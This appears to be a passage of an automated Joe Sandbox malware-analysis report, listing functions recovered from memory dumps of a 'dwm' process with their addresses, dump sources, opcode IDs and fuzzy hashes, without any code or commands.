                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 5[_H
                                                              • API String ID: 0-3279724263
                                                              • Opcode ID: 03c14e212f71d8ed97b10bb26b626f00f7e5107b1bdd8f3c91d82d7a844d2406
                                                              • Instruction ID: 732fe6c74f3ffb3717f52e4ec2767a0ee3a7b925a6eb13066c426d9346eb5a59
                                                              • Opcode Fuzzy Hash: 03c14e212f71d8ed97b10bb26b626f00f7e5107b1bdd8f3c91d82d7a844d2406
                                                              • Instruction Fuzzy Hash: 1891F575A1DA8D8FE759EF6C88797A87FE0FBA5304F4001BAE049C72E6DB7818108741
                                                              Function 00007FFD9B791141 Relevance: .5, Instructions: 461COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 236390c1cfce156987fdca650616e3cb3fbeaba9b1a8f853bd62fad668aff46d
                                                              • Instruction ID: 749995e1450f4bae84018d90a984fa1bfdb74d0bb32a27785d121a7a7385cbde
                                                              • Opcode Fuzzy Hash: 236390c1cfce156987fdca650616e3cb3fbeaba9b1a8f853bd62fad668aff46d
                                                              • Instruction Fuzzy Hash: 7CC10321B6E78A1FE32D4A684C920B477D1EF92305B1987BDD4DBC39B7D828A5178381
                                                              Function 00007FFD9B760C25 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 3e1e3e091fa2299551eb1bf84fdccc06e58fce9408b19a4c3297854147df4760
                                                              • Instruction ID: 023c2525dfb5506bdb7499ea2805908cbd8cbf88e8429f02760ff8b8274beccc
                                                              • Opcode Fuzzy Hash: 3e1e3e091fa2299551eb1bf84fdccc06e58fce9408b19a4c3297854147df4760
                                                              • Instruction Fuzzy Hash: 2721F336A0D78D8FE712DB74C8501DC7BA0EF42325F0546B7C044CB1E6E634264AC792
                                                              Function 00007FFD9B760C38 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 50f83bd627c7795aaf684152213202895a195651f69b49a1b7fa27557f406907
                                                              • Instruction ID: cefd56cb6300d30f73e76aca4a2b397b6d198fa328206a3d9776807151ce9784
                                                              • Opcode Fuzzy Hash: 50f83bd627c7795aaf684152213202895a195651f69b49a1b7fa27557f406907
                                                              • Instruction Fuzzy Hash: 2E11A025A0D78D8FE702DB74C8602D97FA0AF42315F0645B7C084DB1E6E63826498791
                                                              Function 00007FFD9B760C40 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 2a93d0d2d26a02e33d966b15b6ac80203e8169ed7ef98caa94ca17caecd675e3
                                                              • Instruction ID: 1703f2a8bea6d902c2caa78ca0948ee0793783b0c9012229b2794096c9c8cbc0
                                                              • Opcode Fuzzy Hash: 2a93d0d2d26a02e33d966b15b6ac80203e8169ed7ef98caa94ca17caecd675e3
                                                              • Instruction Fuzzy Hash: 7301AD35A097898FE702DB74C8606D97FB0AF42314F0645F7C084DB2A6E6382A48CB91
                                                              Function 00007FFD9B760C48 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 92df1abe79a005ec21fbf4e6a8ee6a0c1740863e53bd2229cd0a2cd755ea5dae
                                                              • Instruction ID: 09e1b808a860389daa07806921a03c75a603fd76565346bc86e6550428f709af
                                                              • Opcode Fuzzy Hash: 92df1abe79a005ec21fbf4e6a8ee6a0c1740863e53bd2229cd0a2cd755ea5dae
                                                              • Instruction Fuzzy Hash: E001B135A0D7898FD702DB74C8506DD7FF0AF02314F0541E7D040DB2A6E6386A48CB91
                                                              Function 00007FFD9B760C50 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 45d36604149e4939c2752f4f34ffaf94c8c01d45cafaf46e815bdfcaaef72f35
                                                              • Instruction ID: 3fba8d4b67bb7d0115771815d19520ffc3406303d3978068f4b8a94069d1b1d0
                                                              • Opcode Fuzzy Hash: 45d36604149e4939c2752f4f34ffaf94c8c01d45cafaf46e815bdfcaaef72f35
                                                              • Instruction Fuzzy Hash: 32018F34A1D7898FE702DBB4C85469D7FF0AF02314F1542E6D444DB2AAEA386A48C741
                                                              Function 00007FFD9B792FB9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M
                                                              • API String ID: 0-3664761504
                                                              • Opcode ID: 75f1b9803cfea7bf6be682520b8c0ae66b9a72c83b99db623e6489f397be15fd
                                                              • Instruction ID: 898fab54ffd9a7f5d22cbfd650e38ad578b2555ceb1b73c256049ddce21f2dd9
                                                              • Opcode Fuzzy Hash: 75f1b9803cfea7bf6be682520b8c0ae66b9a72c83b99db623e6489f397be15fd
                                                              • Instruction Fuzzy Hash: 35E06D6160E7C48FC71AEA748869454BFA0EF6720174A56EFC045CF1B7EA2D8889C701
                                                              Function 00007FFD9B79AB99 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: I
                                                              • API String ID: 0-3707901625
                                                              • Opcode ID: 75e466a786659bb02594172f8511bca11a2bcbeb6f493a988a42a8287c769195
                                                              • Instruction ID: c99385986ca12b3f885523c7f944cdb2a811c569a5f9e945cf703266d8876b39
                                                              • Opcode Fuzzy Hash: 75e466a786659bb02594172f8511bca11a2bcbeb6f493a988a42a8287c769195
                                                              • Instruction Fuzzy Hash: 88E01A6194F3C44FCB5AAB74887A8443FB0EE6B21178B41EEC189CF5B3E62D9949C701
                                                              Function 00007FFD9B791DD9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: I
                                                              • API String ID: 0-3707901625
                                                              • Opcode ID: c3659515b25f3436d70d2791af22ee83a4254a550373b8fdaa5a92e896adf7c8
                                                              • Instruction ID: e616cb89010d24f6d7f1f89de17602a157cefc52f9548136ec519bd27f98d2c3
                                                              • Opcode Fuzzy Hash: c3659515b25f3436d70d2791af22ee83a4254a550373b8fdaa5a92e896adf7c8
                                                              • Instruction Fuzzy Hash: 14E01A6054A3C44FCB06EB7488698443F709E6B21078B41DEC049CF1B3D62D8949C701
                                                              Function 00007FFD9B773C49 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b770000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: I
                                                              • API String ID: 0-3707901625
                                                              • Opcode ID: a574face320326cfac55711ce04adae5a412f85ffcd3d65acf30478cc3b6934c
                                                              • Instruction ID: 434523552699194c81bc9b584a3ebb9ed3b533fbd8ca8758fc6f8900b227782a
                                                              • Opcode Fuzzy Hash: a574face320326cfac55711ce04adae5a412f85ffcd3d65acf30478cc3b6934c
                                                              • Instruction Fuzzy Hash: E6E01A6054A3C04FCB06EB7484A98443F70DE6721078A41DEC049CF1B3E62D8949C701
                                                              Function 00007FFD9B797089 Relevance: .5, Instructions: 496COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 80ed4d52b9c0389ace1c0417020025bf79ff3554f80c5574cfb6a512aa34a20e
                                                              • Instruction ID: 7348eb676180d3b3393c5e9be5f3bf05a7a4286abe56cdfc995fdb40fc0bdb2c
                                                              • Opcode Fuzzy Hash: 80ed4d52b9c0389ace1c0417020025bf79ff3554f80c5574cfb6a512aa34a20e
                                                              • Instruction Fuzzy Hash: 05024A31B0D7895FE725AB688861AA53BE1EF42314F0502FED44D8B1F3DB28AD46C791
                                                              Function 00007FFD9B79344D Relevance: .3, Instructions: 292COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f11bf35c6626fa6090e7d6d25a5bc5d00ace38fa560b92ea9bd1de6a6d47fcd6
                                                              • Instruction ID: c753056b661c6b1448596164c35c9110bd38e3fb4460a9e25b9b109a7c464c1a
                                                              • Opcode Fuzzy Hash: f11bf35c6626fa6090e7d6d25a5bc5d00ace38fa560b92ea9bd1de6a6d47fcd6
                                                              • Instruction Fuzzy Hash: 5591E721B1DA4D0FEB98FA68487667973D2FF98304F46427AD40EC32E7DD2869458391
                                                              Function 00007FFD9B792411 Relevance: .2, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 03c608e2cdb3d15144e9c98750cd5c6f0fd9232212b9014ffad72137d7d3f4b1
                                                              • Instruction ID: 2b4163cf4b06f1f51376d7eb7e27427e640f77b76ac775a6d41b07ae282fdec2
                                                              • Opcode Fuzzy Hash: 03c608e2cdb3d15144e9c98750cd5c6f0fd9232212b9014ffad72137d7d3f4b1
                                                              • Instruction Fuzzy Hash: 5251E831B0D65D4FDB68FB98C864AA877D2FB94310F0502BAE00DD32E6CE28AD418781
                                                              Function 00007FFD9B760945 Relevance: .2, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08e55feaada47b3e0d00f3e7795f2be6d8a58bf5f2674f3ed13ee5ad86e3ee44
                                                              • Instruction ID: 380e1cb6d85eca194f0c07f34119791c5db4e1f3ce9a909c8778d4f8e38a457d
                                                              • Opcode Fuzzy Hash: 08e55feaada47b3e0d00f3e7795f2be6d8a58bf5f2674f3ed13ee5ad86e3ee44
                                                              • Instruction Fuzzy Hash: 3541073270D9194FD768EA5CF8999F973D0EF4532071501BBE08AC7167DD11AC8287C1
                                                              Function 00007FFD9B760960 Relevance: .1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6d621a3f77bdad853266250713d47e3a04e5457699bb7992951e6eb7f58944fc
                                                              • Instruction ID: 2950245764a6c4c17394ab4b3f0befa1cbad49f6db50574d3372736bc9905566
                                                              • Opcode Fuzzy Hash: 6d621a3f77bdad853266250713d47e3a04e5457699bb7992951e6eb7f58944fc
                                                              • Instruction Fuzzy Hash: ED312922B1CA1D0FE758B66C647AAF873C2DF98325B5041BAF40EC32F7DD18AC414285
                                                              Function 00007FFD9B76116D Relevance: .1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3f9d652e3db78e4239ebfae9b2857b1f91e9cf415b56e37aa06b1df3f3a2c082
                                                              • Instruction ID: a7e2098242c3ec0981e1cf4c6e2d8279bff34397628c6ad328c2a3faeb93d951
                                                              • Opcode Fuzzy Hash: 3f9d652e3db78e4239ebfae9b2857b1f91e9cf415b56e37aa06b1df3f3a2c082
                                                              • Instruction Fuzzy Hash: 5631C431A0964E8FDB49EB68C8689BD7BF0FF56310F0546BAD009D72B2DB38A541CB41
                                                              Function 00007FFD9B760998 Relevance: .1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 928b51a169021419136f3731da4876d5e8b69d59a00ea486508f3e108c2fd9fd
                                                              • Instruction ID: c8cf6824c4de5c60fbac3b6825b31dc7146d66e1aaee5d6d5ae5662ca4f5db23
                                                              • Opcode Fuzzy Hash: 928b51a169021419136f3731da4876d5e8b69d59a00ea486508f3e108c2fd9fd
                                                              • Instruction Fuzzy Hash: F8214620B1CA5D0FE798F66C58BEA7972C3EB98311B4001B9E40EC32F7DD18AC418282
                                                              Function 00007FFD9B796FE8 Relevance: .1, Instructions: 80COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f079f50ad0cfd7dd6ab3f9c060d2846d832df0f15c601ce878fead4508b1816
                                                              • Instruction ID: 640a59f6ce4e238e223c70418e58af10569f11cbc328af59b0d2f6a76308eb5e
                                                              • Opcode Fuzzy Hash: 5f079f50ad0cfd7dd6ab3f9c060d2846d832df0f15c601ce878fead4508b1816
                                                              • Instruction Fuzzy Hash: AA11262BB0D5250EE314B6BCB8B58F97B90DF9223970843B7E18D8A0E3DE18544A8684
                                                              Function 00007FFD9B766CAB Relevance: .1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1a3501fbbed1e2452e5a6bbdfd5e316315247bac04317e0c468c15784594d587
                                                              • Instruction ID: adffa29c662429b5ce9998da29b96e046854c8ed99217fa3c83a3e52183be282
                                                              • Opcode Fuzzy Hash: 1a3501fbbed1e2452e5a6bbdfd5e316315247bac04317e0c468c15784594d587
                                                              • Instruction Fuzzy Hash: 2D211F31E19A1D8FDBA5EB48C4A06E973E1FB68304F5502BAD40DD32B5DA74AE409B81
                                                              Function 00007FFD9B79D675 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c2279ed2cf314490f07e3be3d34d8e59ac2b48803c9142154984132c72c54f41
                                                              • Instruction ID: e889129f309a7ee278a6c92533e52450978f0dec7fbec128959c78a5ac268cfd
                                                              • Opcode Fuzzy Hash: c2279ed2cf314490f07e3be3d34d8e59ac2b48803c9142154984132c72c54f41
                                                              • Instruction Fuzzy Hash: 45018431F1961E4BEB68D6A8D4697FD77E1EF84340F050631E50ED71E1DA2CA9948780
                                                              Function 00007FFD9B79B23D Relevance: .0, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 672d78881aa685cb7617e65c412570b7b3b1216849f29af663ff4412dbf01a37
                                                              • Instruction ID: f77bb8c870e41d3926788a1d1bc3e368e33f81b395f90f6a0584005b4eefddc1
                                                              • Opcode Fuzzy Hash: 672d78881aa685cb7617e65c412570b7b3b1216849f29af663ff4412dbf01a37
                                                              • Instruction Fuzzy Hash: 18F08635B0A90D4EEB54E69C54A67FC77D1EF98311F440176E40CC32F3CE1869458781
                                                              Function 00007FFD9B764CD0 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08f0ed0c1aaa846b9c5982f94ffddeed8767cff0071ce0dec6aac59c3332fcdc
                                                              • Instruction ID: 58034a99f9b1cae3b27b2b23621fbd704f0439663d01ebf60b4959986e7e3a4b
                                                              • Opcode Fuzzy Hash: 08f0ed0c1aaa846b9c5982f94ffddeed8767cff0071ce0dec6aac59c3332fcdc
                                                              • Instruction Fuzzy Hash: 4D012120F19B1D8EE7B5E66888747B971D1BF48700F4602B9E45ED32B7EF286E404742
                                                              Function 00007FFD9B797A3D Relevance: .0, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: daee2fa1a6e6264072c4ac78d0d566bb33050aa9f935d31f1b122265433fbf64
                                                              • Instruction ID: 9aea6ba3900343a7174a18c9ff2b428a75f73c9e4131aeda117939bc85228cde
                                                              • Opcode Fuzzy Hash: daee2fa1a6e6264072c4ac78d0d566bb33050aa9f935d31f1b122265433fbf64
                                                              • Instruction Fuzzy Hash: F6F06922A0E7C55FD31A473888754687F71EE6722530B01E7C095CF0F3D929998AC362
                                                              Function 00007FFD9B764D19 Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 82a5860a0b7a321af4d36804a7609a158e09df83ae2663a99a4a2c573a75a3d2
                                                              • Instruction ID: 5ff05185b17256106a1792fd60ac221121d63b3387a5053b8fbb93e8ac23a181
                                                              • Opcode Fuzzy Hash: 82a5860a0b7a321af4d36804a7609a158e09df83ae2663a99a4a2c573a75a3d2
                                                              • Instruction Fuzzy Hash: 78011230A1961ECEEB78EA54D8647F532A1FF54701F1511BED40ED32B2EA2C2B858A01
                                                              Function 00007FFD9B77421A Relevance: .0, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b770000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b5e4e8e5362a5a88242947fa6bc6696dfa40c921485bf028a840f49d437690af
                                                              • Instruction ID: de32f496216db3924ea38808fecc250060685f03e72704e68a5f8b0bd57c5bbd
                                                              • Opcode Fuzzy Hash: b5e4e8e5362a5a88242947fa6bc6696dfa40c921485bf028a840f49d437690af
                                                              • Instruction Fuzzy Hash: 87018F70E0861E8AEB24EA94C8A46BD77F1FB40314F11073AD016D72F5DFB866458A80
                                                              Function 00007FFD9B79AB09 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 82a884a73d0b61510eef020e734f9c6633b5f480d21cdba7e23f4f496c77ebfa
                                                              • Instruction ID: 22333048b608de6ac65dd08624c99a6cbbbf00a19350bea1a0b2bd83504e5abc
                                                              • Opcode Fuzzy Hash: 82a884a73d0b61510eef020e734f9c6633b5f480d21cdba7e23f4f496c77ebfa
                                                              • Instruction Fuzzy Hash: D1F0E530B5C7C80FC71A9A2D58654617BF1DF5B20534A42FFD49ACB2A3DD18EC458785
                                                              Function 00007FFD9B7741BB Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b770000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e81ef5309e618f83601f0a60200bb5dd2761664f8ad8159a94b30b8358ca33c2
                                                              • Instruction ID: de7230c4226a910f9c76430b1e94d9b43514d36c5cadd9c17e6180817976a0af
                                                              • Opcode Fuzzy Hash: e81ef5309e618f83601f0a60200bb5dd2761664f8ad8159a94b30b8358ca33c2
                                                              • Instruction Fuzzy Hash: 8DF06230E1861E8BE750EFA8DCA55BD77B1FF40314F50037AD4199B2EADF6429418B81
                                                              Function 00007FFD9B774935 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b770000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8131b47b867fc6b529868362e4b1c81cc5b27f3f3f8f66b61e33cd7e4fe003e0
                                                              • Instruction ID: d84c2dc4f2c2d82d45b8845fcbda32946ae5a8debe4aee7fe3e45d6001626ae7
                                                              • Opcode Fuzzy Hash: 8131b47b867fc6b529868362e4b1c81cc5b27f3f3f8f66b61e33cd7e4fe003e0
                                                              • Instruction Fuzzy Hash: 76F0B435B1E66E8EE6359A9888A05BE7364EF00300B024378D41AC31F6EE78EA4182C0
                                                              Function 00007FFD9B764DA0 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction ID: fed1ab85ae184c5a851267a9bda0b80492264ca6f9164f8e354e1c71cb223adc
                                                              • Opcode Fuzzy Hash: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction Fuzzy Hash: 2EF09630B0970DCEE674EA44E874AB53391AF54300F1112BAD90EC32F3EE1C6F454501
                                                              Function 00007FFD9B791D49 Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 66919c614c019bd96aad4cec9afff1b5cfb4578852579dc13f6e9f296e09760c
                                                              • Instruction ID: d866e9248c7fdfbd88fd75bb08f9f6279a047ea9997d10c1dfcd3de525c10059
                                                              • Opcode Fuzzy Hash: 66919c614c019bd96aad4cec9afff1b5cfb4578852579dc13f6e9f296e09760c
